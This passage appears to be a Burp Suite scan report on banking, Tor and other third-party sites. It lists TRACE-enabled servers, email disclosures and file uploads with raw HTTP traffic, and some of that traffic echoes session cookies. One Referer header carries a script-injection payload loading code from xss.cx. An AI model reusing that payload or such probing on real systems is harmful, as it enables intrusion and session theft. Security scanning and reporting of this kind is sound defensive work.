User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gridTracking=%5B%5BB%5D%5D; s_cc=true; s_sq=wsinternetglobal%2Cwspublic%3D%2526pid%253Dconversion%25253Asignon-decision.htm%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252Fonline-access%25252Fsignon.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:54:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 18 Jul 2011 14:45:13 GMT
ETag: "e77-34d1-bf4f040"
Accept-Ranges: bytes
Content-Length: 13521
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.o
...[SNIP]...
</script>
<script language="JavaScript" src="https://onlineservices.wellsfargo.com/auth/static/scripts/login.js" type="text/javascript"></script>
<script language="JavaScript" src="https://onlineservices.wellsfargo.com/auth/static/scripts/user-prefs.js" type="text/javascript"></script>
...[SNIP]...

16. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sc1.maps.live.com
Path:   /js/bin/20110629.2253/en-us/Collections.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /js/bin/20110629.2253/en-us/Collections.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sc1.maps.live.com
Cookie: MUID=28B2E8D1A1F1676C3E0BEAE2A5F1676C

Response

HTTP/1.1 200 OK
Cache-Control: max-age=63072000
Content-Type: application/x-javascript
Accept-Ranges: bytes
ETag: "030deb6ef36cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-BM-Srv: BL2M001208
Content-Length: 493618
Age: 408494
Date: Tue, 19 Jul 2011 12:11:16 GMT
Last-Modified: Thu, 30 Jun 2011 06:34:08 GMT
Expires: Sat, 13 Jul 2013 18:43:02 GMT
Connection: keep-alive

...if(typeof _VERegisterNamespaces==="undefined")_VERegisterNamespaces=Type.registerNamespace;Type.registerNamespace("Collections");Collections.$create_Bounds=function(g,d,e,f,b,c){var a={};a.x1=e;a.x
...[SNIP]...
</div>");a.push('<input id = "collectionimportfileid1" type="file" name="datafile" size="50" style="width:27em;height:1.9em">');a.push("</input>
...[SNIP]...

17. TRACE method is enabled  previous  next
There are 5 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


17.1. https://blog.torproject.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.torproject.org
Path:   /

Request

TRACE / HTTP/1.0
Host: blog.torproject.org
Cookie: 44001fcdd2221ee

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:47 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blog.torproject.org
Cookie: 44001fcdd2221ee; SESS2a0bf158f8e5df748619130e22f9b04a=pr37gpar6q95s8fb8vbo37ekd0


17.2. http://networkpresence.com.au/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /

Request

TRACE / HTTP/1.0
Host: networkpresence.com.au
Cookie: d474945db1831f1b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: networkpresence.com.au
Cookie: d474945db1831f1b; 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24


17.3. http://sensor2.suitesmart.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: 90dc1cad793409aa

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: 90dc1cad793409aa; spass=639dc8c25a6771ff844957f2a2748213; G12546=C1S98727-3-0-0-0-1311017115-2; G15482=C1S103937-43-0-0-0-1311016999-23706


17.4. http://www.defaultroute.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.defaultroute.com
Cookie: 76fb7c25f180f4b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.defaultroute.com
Cookie: 76fb7c25f180f4b


17.5. https://www.wellsfargoadvisors.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wellsfargoadvisors.com
Cookie: 632935df9780b39b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:09 GMT
Server: IBM_HTTP_Server
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wellsfargoadvisors.com
Cookie: 632935df9780b39b


18. Email addresses disclosed  previous  next
There are 19 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


18.1. http://ads1.msads.net/library/dap.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msads.net
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads1.msads.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Age: 62688
Date: Tue, 19 Jul 2011 12:13:18 GMT
Last-Modified: Mon, 13 Jun 2011 17:27:41 GMT
Expires: Wed, 20 Jul 2011 18:48:30 GMT
Content-Length: 13811
Connection: keep-alive


var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

18.2. http://ads1.msn.com/library/dap.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Host: ads1.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scout.com/search.aspx?s=143&p=19&sitesearch=scout.com&q=1%3CScRiPt%2Fxss%20src%3Dhttp%3A%2F%2Fxss.cx%2Fcx.js%3F964407%3E%3C%2FScRiPt%3E
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; mh=LENOVO; CULTURE=EN-US; MSNRPSShare=1; MUID=3957719BE8F34A5DA51D204E7E06704A; Sample=87; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; expid=id=a7ed379634844c0891f7fd0905cd7d4e&bd=2011-07-02T23:40:18.696&v=2; SRCHHPGUSR=AS=1; MSNTVID=af7f3bc9414d4d7f98f7762d0ecd4c67; CC=US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:04:43 GMT
Expires: Tue, 19 Jul 2011 17:38:27 GMT
Last-Modified: Mon, 13 Jun 2011 17:27:41 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13811


var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

18.3. https://onlineservices.wachovia.com/identity/IdentityMgr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /identity/IdentityMgr

Issue detail

The following email address was disclosed in the response:

Request

GET /identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:52:56 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 18355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<span class="small">onlineservices@wachovia.com</span>
...[SNIP]...

18.4. https://secure2.internode.on.net/nodestore/checkout/customer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/checkout/customer/

Issue detail

The following email address was disclosed in the response:

Request

GET /nodestore/checkout/customer/ HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/products/residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 10:08:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 24416
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>Welcome :: NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, p
...[SNIP]...
<input type="email" name="email_address_existing" id="email_address_existing" value="" helper="formEmail" autocomplete="off" class="email_address" placeholder="example@example.com">
...[SNIP]...
<input type="email" name="email_address" id="email_address" value="" helper="formEmail" autocomplete="off" class="email_address" placeholder="example@example.com">
...[SNIP]...

18.5. http://widgets.twimg.com/j/2/widget.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.css

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.css HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: yFPEo7/5CTnxmKnUEjXU1/OmPGPsNh0IMRRhNdN4WTdj8fNE1ntiR92x6Uowmhmg
x-amz-request-id: DD5E22500AC48FB0
Date: Sun, 08 May 2011 02:35:35 GMT
Expires: Sat, 27 Feb 2021 01:15:01 GMT+00:00
Last-Modified: Wed, 02 Mar 2011 01:15:13 GMT
ETag: "9842b420d8c91a4cbb004d17a5d54054"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3430
Server: AmazonS3
Age: 6218666
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 640f5f5076f34cd938d9dfd8fb99d6fdf24a657f1b06c2505ac948dcdea79fde318f49be8c544d73
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 6f4c292df8fb7b5bd5bfa8aff66748aa.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

18.6. http://widgets.twimg.com/j/2/widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.js HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: ZkuDk/yfZr5+3RiP/dOR8x+1/sInvNiuo89zrDBsMmP3FxSBfsSBX0L1xZo92idx
x-amz-request-id: CAC1EF4139F59170
Date: Wed, 15 Jun 2011 00:49:37 GMT
Last-Modified: Fri, 08 Apr 2011 20:34:17 GMT
ETag: "8f109f7ba100454bc391fc07377c1aed"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 31383
Server: AmazonS3
Age: 66275
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: e0da31d53eba4468ecd847ff678aa11492bc91dd54863415154135e482e103d69f7ef704db311c8b
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 6f4c292df8fb7b5bd5bfa8aff66748aa.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

18.7. http://www.codero.com/css/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codero.com
Path:   /css/screen.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/screen.css HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:49 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 06 May 2009 19:56:12 GMT
ETag: "43f7d0-f6-c98c8f00"
Accept-Ranges: bytes
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:49 GMT
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 246
Content-Type: text/css

/*
File: screen.css
Theme: Codero
Author: Bryce Nill
email: brycen@aplus.net
*/

/* import stylesheets and hide from ie/mac \*/
@import url("reset.css");
@import url("grid.css");
@import url("style.css");
/* end import/hide */

18.8. http://www.codero.com/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codero.com
Path:   /css/style.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/style.css HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:52 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 15 Jul 2011 21:12:57 GMT
ETag: "43f173-18c16-1d134840"
Accept-Ranges: bytes
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:52 GMT
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 101398
Content-Type: text/css

/*
File: style.css
Theme: Codero
Author: Bryce Nill
email: brycen@aplus.net
*/

/*--------------------------------------------------
   Typography
--------------------------------------------------*/

body {font: 12px Arial, Helvetica, sans-serif; color: #4d4d4d;}
#oute
...[SNIP]...

18.9. http://www.codero.com/js/hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codero.com
Path:   /js/hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/hoverIntent.js HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:49 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 13 Jul 2011 21:47:42 GMT
ETag: "43f175-8dd-5dab1b80"
Accept-Ranges: bytes
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:49 GMT
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 2269
Content-Type: application/javascript

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @pa
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.10. http://www.defaultroute.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<a href="mailto:info@defaultroute.com">info@defaultroute.com</a>
...[SNIP]...

18.11. http://www.defaultroute.com/category/founders/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /category/founders/

Issue detail

The following email address was disclosed in the response:

Request

GET /category/founders/ HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
Referer: http://www.defaultroute.com/services/thenetwork/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152370604.79046687.1311040794.1311040794.1311040794.1; __utmb=152370604.2.10.1311040794; __utmc=152370604; __utmz=152370604.1311040794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 10607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<a href="mailto:info@defaultroute.com">info@defaultroute.com</a>
...[SNIP]...

18.12. http://www.defaultroute.com/services/thenetwork/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /services/thenetwork/

Issue detail

The following email address was disclosed in the response:

Request

GET /services/thenetwork/ HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
Referer: http://www.defaultroute.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152370604.79046687.1311040794.1311040794.1311040794.1; __utmb=152370604.1.10.1311040794; __utmc=152370604; __utmz=152370604.1311040794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Link: <http://www.defaultroute.com/?p=567>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 10570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<a href="mailto:info@defaultroute.com">info@defaultroute.com</a>
...[SNIP]...

18.13. https://www.torservers.net/donate.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /donate.html

Issue detail

The following email address was disclosed in the response:

Request

GET /donate.html HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

